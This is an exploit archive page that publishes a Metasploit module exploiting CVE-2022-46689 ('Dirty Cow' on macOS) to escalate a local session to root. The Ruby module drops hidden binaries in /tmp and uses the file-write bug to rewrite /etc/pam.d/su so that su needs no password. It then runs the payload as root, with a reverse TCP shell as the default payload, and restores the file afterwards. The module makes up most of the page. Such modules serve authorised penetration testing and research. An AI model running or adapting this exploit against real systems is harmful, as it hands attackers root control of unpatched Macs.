exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation
Posted Feb 3, 2023
Authored by timwr, Ian Beer, Zhuowei Zhang | Site metasploit.com

Dirty Cow arbitrary file write local privilege escalation exploit for macOS.

tags | exploit, arbitrary, local
advisories | CVE-2022-46689
SHA-256 | 2c735a5dbdfd48004da2df38d8a8eed0528ab5199ff9cd6dbf70e890c7786c0c

macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Post::OSX::Priv
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation',
'Description' => %q{
An app may be able to execute arbitrary code with kernel privileges
},
'License' => MSF_LICENSE,
'Author' => [
'Ian Beer', # discovery
'Zhuowei Zhang', # proof of concept
'timwr' # metasploit integration
],
'References' => [
['CVE', '2022-46689'],
['URL', 'https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c'],
['URL', 'https://github.com/zhuowei/MacDirtyCowDemo'],
],
'Platform' => 'osx',
'Arch' => ARCH_X64,
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' },
'Targets' => [
[ 'Mac OS X x64 (Native Payload)', {} ],
],
'DisclosureDate' => '2022-12-17',
'Notes' => {
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
'Reliability' => [REPEATABLE_SESSION],
'Stability' => [CRASH_SAFE]
}
)
)
register_advanced_options [
OptString.new('TargetFile', [ true, 'The pam.d file to overwrite', '/etc/pam.d/su' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end

def check
version = Rex::Version.new(get_system_version)
if version > Rex::Version.new('13.0.1')
CheckCode::Safe
elsif version < Rex::Version.new('13.0') && version > Rex::Version.new('12.6.1')
CheckCode::Safe
elsif version < Rex::Version.new('10.15')
CheckCode::Safe
else
CheckCode::Appears
end
end

def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end

unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end

payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
upload_and_chmodx payload_file, binary_payload
register_file_for_cleanup payload_file

target_file = datastore['TargetFile']
current_content = read_file(target_file)
backup_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
unless write_file(backup_file, current_content)
fail_with Failure::BadConfig, "#{backup_file} is not writable"
end
register_file_for_cleanup backup_file

replace_content = current_content.sub('rootok', 'permit')

replace_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
unless write_file(replace_file, replace_content)
fail_with Failure::BadConfig, "#{replace_file} is not writable"
end
register_file_for_cleanup replace_file

exploit_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
exploit_exe = exploit_data 'CVE-2022-46689', 'exploit'
upload_and_chmodx exploit_file, exploit_exe
register_file_for_cleanup exploit_file

exploit_cmd = "#{exploit_file} #{target_file} #{replace_file}"
print_status("Executing exploit '#{exploit_cmd}'")
result = cmd_exec(exploit_cmd)
print_status("Exploit result:\n#{result}")

su_cmd = "echo '#{payload_file} & disown' | su"
print_status("Running cmd:\n#{su_cmd}")
result = cmd_exec(su_cmd)
unless result.blank?
print_status("Command output:\n#{result}")
end

exploit_cmd = "#{exploit_file} #{target_file} #{backup_file}"
print_status("Executing exploit (restoring) '#{exploit_cmd}'")
result = cmd_exec(exploit_cmd)
print_status("Exploit result:\n#{result}")
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close